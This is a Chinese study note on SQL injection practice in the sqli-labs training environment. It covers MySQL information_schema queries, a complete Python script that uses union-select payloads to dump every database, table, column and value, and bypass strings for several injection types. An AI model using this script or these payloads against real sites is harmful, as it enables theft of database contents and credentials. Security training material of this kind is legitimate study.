基础知识
常用函数:
version() Mysql版本
user() 数据库用户名
database() 数据库名
@@datadir 数据库安装路径
@@version_compile_os 操作系统版本
常用查询语句:
- 查库
select schema_name from information_schema.schemata
- 查表
select table_name from information_schema.tables where table_schema='security'
-- 该表名使用时大多转为 16 进制
- 查列
select column_name from information_schema.columns where table_name='users'
- 查字段
select username,password from security.users
- 查询结果按第n列排序 (用于报错注入测试有几列)
order by (n)
sql注释符:
- #
- --+
- --
字符串连接函数
- concat (str1 , str2) -- 连接字符串, 无分隔符
- concat (-/~ , str1 , str2) -- 连接字符串, 有分隔符
- group_concat (str1 , str2) -- 连接字符串, 并用 ',' 分隔每一个值
字符型 数字型 搜索型 注入的区别和判断
(如题)
study 1:
首先用id=1'发现报错, 再用id=1' or '1'='1发现成功注入, 判断为字符型注入
写了个脚本, 一把梭
# coding=utf-8
import requests
from urllib import parse
import sys
from bs4 import BeautifulSoup
# Target of the sqli-labs exercise (Less-1); every helper below issues its GET request against this URL.
url = "http://www.sqlstudy.com/sqlstudy/Less-1"
def CheckStatus(r_text):
    """Return 1 when *r_text* contains the marker ``"Login name"``, else 0.

    The callers in this file use this as the success signal for a response
    page: the presence of the marker is treated as "the injected query
    returned a row". The comparison is case-sensitive and returns an int,
    not a bool.
    """
    return 1 if "Login name" in r_text else 0
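def PrintNameAndPswd(res_text):
    """Return the ``"Your Login name:..."`` segment of a response page.

    Despite its name the function prints nothing: it returns the text that
    starts at the marker ``"Your Login name:"`` and runs up to (not including)
    the next ``'<'``. The marker itself is kept in the result; callers strip
    the part up to ``':'`` themselves. The password segment that follows on
    the page is not extracted (no caller in this file uses it).

    Args:
        res_text: the HTML body of the lab response page.

    Returns:
        str: the login-name segment, e.g. ``"Your Login name:Dumb"``.

    Raises:
        ValueError: if the marker or a terminating ``'<'`` is missing.
    """
    pos_name = res_text.index("Your Login name:")
    # str.index performs the forward scan to the next tag opener; a missing
    # '<' raises ValueError, consistent with a missing marker.
    end_name = res_text.index("<", pos_name)
    return res_text[pos_name:end_name]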
def GetColumnsNum():
    """Binary-search the column count of the injectable SELECT via ``order by N``.

    Probes N in [1, 20]: when the response still contains "Login name"
    (CheckStatus == 1) N is a valid column position and the search moves
    right; otherwise it moves left. Returns the ``mid`` recomputed after the
    final bounds update, which equals ``right`` once the loop exits — the
    largest N that succeeded, or 0 if none did.
    """
    left = 1
    right = 20
    mid = (left + right) // 2
    while left <= right:
        payload = "id=1' order by {}--+".format(mid)
        # params is a pre-built string here; requests appends it as the query string.
        res = requests.get(url = url , params = payload)
        # Debug aid: print(parse.unquote(res.url)) shows the decoded request URL.
        res_text = res.text
        if CheckStatus(res_text):
            # PrintNameAndPswd(res_text , pos_name , pos_pswd)  -- stale debug call; the function now takes one argument.
            left = mid + 1
        else:
            right = mid - 1
        # Recomputed after the bounds move; this is the value returned once the loop ends.
        mid = (right + left) // 2
    return mid
def HowItContrl(columnsnum):
    """Show which columns of ``union select 1,2,...,columnsnum`` the page echoes.

    The author's note below records the page text seen on the lab: columns 2
    and 3 are the ones rendered, which is why later payloads place the
    interesting expression in position 2. The result of PrintNameAndPswd is
    discarded and nothing is returned; the call in __main__ is commented out.
    """
    # Page text recorded by the author:
    # Your Login name:2
    # Your Password:3
    payload = "id=-1' union select "
    for i in range(1 , columnsnum + 1):
        payload = payload + "{},".format(i)
    # strip(",") removes the trailing comma before the comment terminator is appended.
    res = requests.get(url=url , params=payload.strip(",") + '--+')
    res_text = res.text
    if CheckStatus(res_text):
        PrintNameAndPswd(res_text)
def GetAllDatabase():
    """Return the page segment listing all schema names, or None.

    The ``group_concat(schema_name)`` subquery is placed in column 2, which the
    page renders after "Your Login name:". On success the segment is returned
    with the marker still attached (``__main__`` strips it and splits on ',').
    When CheckStatus fails the function falls through and returns None.
    """
    payload = "id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+"
    res = requests.get(url=url, params=payload)
    # Debug aid: print(parse.unquote(res.url)) shows the decoded request URL.
    res_text = res.text
    if (CheckStatus(res_text)):
        return PrintNameAndPswd(res_text)
def WhereAmI():
    """Return the current database name (``database()``), or None.

    Unlike GetAllDatabase this helper strips the "Your Login name:" prefix
    itself and returns only the text after the ':'. Falls through to None
    when CheckStatus fails.
    """
    payload = "id=-1' union select 1,database(),3 --+"
    res = requests.get(url=url, params=payload)
    # Debug aid: print(parse.unquote(res.url)) shows the decoded request URL.
    res_text = res.text
    if (CheckStatus(res_text)):
        MyPosition = PrintNameAndPswd(res_text)
        return MyPosition[MyPosition.index(":") + 1 : ]
def GetTableName(DatabaseName):
    """Return the list of table names in schema *DatabaseName*, or None.

    DatabaseName is interpolated unescaped inside double quotes in the
    payload. The comma-joined ``group_concat(table_name)`` result is split
    into a list after the "Your Login name:" prefix is removed. Falls
    through to None when CheckStatus fails — callers must handle that.
    """
    payload = "id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=\"{}\"--+".format(DatabaseName)
    res = requests.get(url=url, params=payload)
    # Debug aid: print(parse.unquote(res.url)) shows the decoded request URL.
    res_text = res.text
    if (CheckStatus(res_text)):
        TableName = PrintNameAndPswd(res_text)
        TableName = TableName[TableName.index(":") + 1 :].split(",")
        return TableName
def GetColumnName(TableName):
    """Return the list of column names of *TableName*, or None.

    TableName is interpolated unescaped inside single quotes. Note the query
    filters on table_name only (no table_schema), so same-named tables in
    other schemas contribute their columns as well. Falls through to None
    when CheckStatus fails.
    """
    payload = "id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='{}' --+".format(TableName)
    res = requests.get(url=url, params=payload)
    # Debug aid: print(parse.unquote(res.url)) shows the decoded request URL.
    res_text = res.text
    if (CheckStatus(res_text)):
        ColumnName = PrintNameAndPswd(res_text)
        ColumnName = ColumnName[ColumnName.index(":") + 1 :].split(",")
        return ColumnName
def GetDetails(DatabaseName , TableName , ColumnName):
    """Return the values of ``DatabaseName.TableName.ColumnName`` as a list, or None.

    All three names are interpolated unescaped. The comma-joined
    ``group_concat`` result is split on ',' — a value that itself contains a
    comma will therefore appear as several entries. Falls through to None
    when CheckStatus fails; ``__main__`` checks for that case.
    """
    payload = "id=-1' union select 1,group_concat({}),3 from {}.{} --+".format(ColumnName , DatabaseName , TableName)
    res = requests.get(url=url, params=payload)
    # Debug aid: print(parse.unquote(res.url)) shows the decoded request URL.
    res_text = res.text
    if (CheckStatus(res_text)):
        Details = PrintNameAndPswd(res_text)
        Details = Details[Details.index(":") + 1 :].split(",")
        return Details
# Entry point: walks schema -> table -> column -> values and writes an indented
# report to sqli-lab1.txt. Every helper returns None when CheckStatus fails;
# only the GetDetails result is guarded below, a None from GetTableName or
# GetColumnName would make len() raise TypeError.
if __name__ == "__main__" :
    with open('sqli-lab1.txt' , 'w') as f:
        columnsnum = GetColumnsNum()
        f.write("column_number = " + str(columnsnum) + '\n')
        # HowItContrl(columnsnum)  -- optional check of which columns the page echoes.
        DatabaseName = GetAllDatabase()
        # Drop the "Your Login name:" prefix, then split the group_concat list on ','.
        DatabaseName = DatabaseName[DatabaseName.index(":") + 1:].split(",")
        MyPosition = WhereAmI()
        f.write("You are in : " + MyPosition + '\n')
        for i in range(0,len(DatabaseName)):
            f.write("DatabaseName : " + DatabaseName[i] + '\n')
            TableName = []
            TableName = GetTableName(DatabaseName[i])
            # print(TableName)
            for j in range(0,len(TableName)):
                f.write("--TableName : " + TableName[j] + '\n')
                ColumnName = []
                ColumnName = GetColumnName(TableName[j])
                # print(ColumnName)
                for k in range(0, len(ColumnName)):
                    f.write("----ColumnName : " + ColumnName[k] + '\n')
                    Details = []
                    Details = GetDetails(DatabaseName[i] , TableName[j] , ColumnName[k])
                    # print(type(Details))
                    # String-typed None test; `Details is None` is the idiomatic equivalent.
                    Details_type = str(type(Details))
                    if not "NoneType" in Details_type:
                        for l in range(0,len(Details)):
                            f.write("------Details : " + Details[l] + '\n')
                            # Separator line after the last value of each column.
                            if l == len(Details) - 1:
                                f.write("\n---------------------------------------------------------------\n\n")
                    else:
                        f.write("--------Details : NULL \n")
study 2:
发现是数字型, 用id=-1 or 1=1--+就能绕过, 然后脚本改改也能一把梭
study 3:
使用id=1'之后发现报错, 结合错误语句看出是('id'), 用id=-1') or 1=1--+就能绕过, 然后改脚本一把梭
study 4:
id=1'没报错, 换成id=1"报错, 结合语句判断出是("id"), 用id=-1") or 1=1--+即可绕过, 改脚本梭哈